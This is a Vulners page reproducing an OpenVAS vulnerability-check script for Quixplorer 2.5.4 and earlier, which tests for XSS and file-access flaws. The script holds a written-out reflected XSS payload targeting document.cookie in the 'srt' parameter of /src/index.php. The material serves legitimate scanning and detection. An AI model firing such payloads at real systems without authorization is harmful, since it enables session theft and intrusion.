Lucene search
+L

Quixplorer < 2.5.5 Multiple Vulnerabilities - Active Check

🗓️ 04 Nov 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 24 Views

Quixplorer Multiple Vulnerabilities. Multiple errors in input validation allow remote attackers to gain access to arbitrary files and execute script code. Affects Quixplorer version 2.5.4 and prior. Upgrade to version 2.5.5 or later

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-1642
3 Jan 202000:49
circl
cve
CVE
CVE-2013-1641
26 Oct 201417:00
cve
cve
CVE
CVE-2013-1642
2 Jan 202020:18
cve
cvelist
Cvelist
CVE-2013-1641
26 Oct 201417:00
cvelist
cvelist
Cvelist
CVE-2013-1642
2 Jan 202020:18
cvelist
euvd
EUVD
EUVD-2013-1672
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2013-1673
7 Oct 202500:30
euvd
nvd
NVD
CVE-2013-1641
26 Oct 201417:55
nvd
nvd
NVD
CVE-2013-1642
2 Jan 202021:15
nvd
prion
Prion
Directory traversal
26 Oct 201417:55
prion
Rows per page
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.804876");
  script_version("2026-03-27T15:50:34+0000");
  script_tag(name:"last_modification", value:"2026-03-27 15:50:34 +0000 (Fri, 27 Mar 2026)");
  script_tag(name:"creation_date", value:"2014-11-04 17:05:21 +0530 (Tue, 04 Nov 2014)");
  script_tag(name:"cvss_base", value:"7.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2021-01-11 15:50:00 +0000 (Mon, 11 Jan 2021)");

  script_cve_id("CVE-2013-1641", "CVE-2013-1642");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Quixplorer < 2.5.5 Multiple Vulnerabilities - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl",
                      "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl",
                      "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"Quixplorer is prone to multiple vulnerabilities.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"Multiple errors exist as the input passed via the 'dir',
  'item', 'order', 'searchitem', 'selitems[]', and 'srt' parameters is not validated upon
  submission to the /quixplorer/src/index.php script.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to gain
  access to arbitrary files and execute arbitrary script code in a user's browser within the trust
  relationship between user's browser and the server.");

  script_tag(name:"affected", value:"Quixplorer version 2.5.4 and prior.");

  script_tag(name:"solution", value:"Update to version 2.5.5 or later.");

  script_xref(name:"URL", value:"http://secunia.com/advisories/55725");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/63962");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/63964");
  script_xref(name:"URL", value:"https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-030.txt");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("port_service_func.inc");

port = http_get_port(default: 80);

if (!http_can_host_php(port: port))
  exit(0);

foreach dir (make_list_unique("/", "/quixplorer", "/filemanager", "/filemgr", http_cgi_dirs(port: port))) {
  if (dir == "/")
    dir = "";

  res = http_get_cache(port: port, item: dir + "/src/index.php");

  if (!res || ">Login to use QuiXplorer<" >!< res || res !~ "title.*QuiXplorer Version")
    continue;

  url = dir + "/src/index.php?action=list&dir=_config&order=name&" +
        'srt="><script>alert(document.cookie);</script>';

  if (http_vuln_check(port: port, url: url, check_header: TRUE,
                      pattern: "><script>alert\(document\.cookie\);</script>", extra_check: "QuiXplorer<")) {
    report = http_report_vuln_url(port: port, url: url);
    security_message(port: port, data: report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Mar 2026 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 27.8
CVSS 3.16.1
EPSS0.0372
24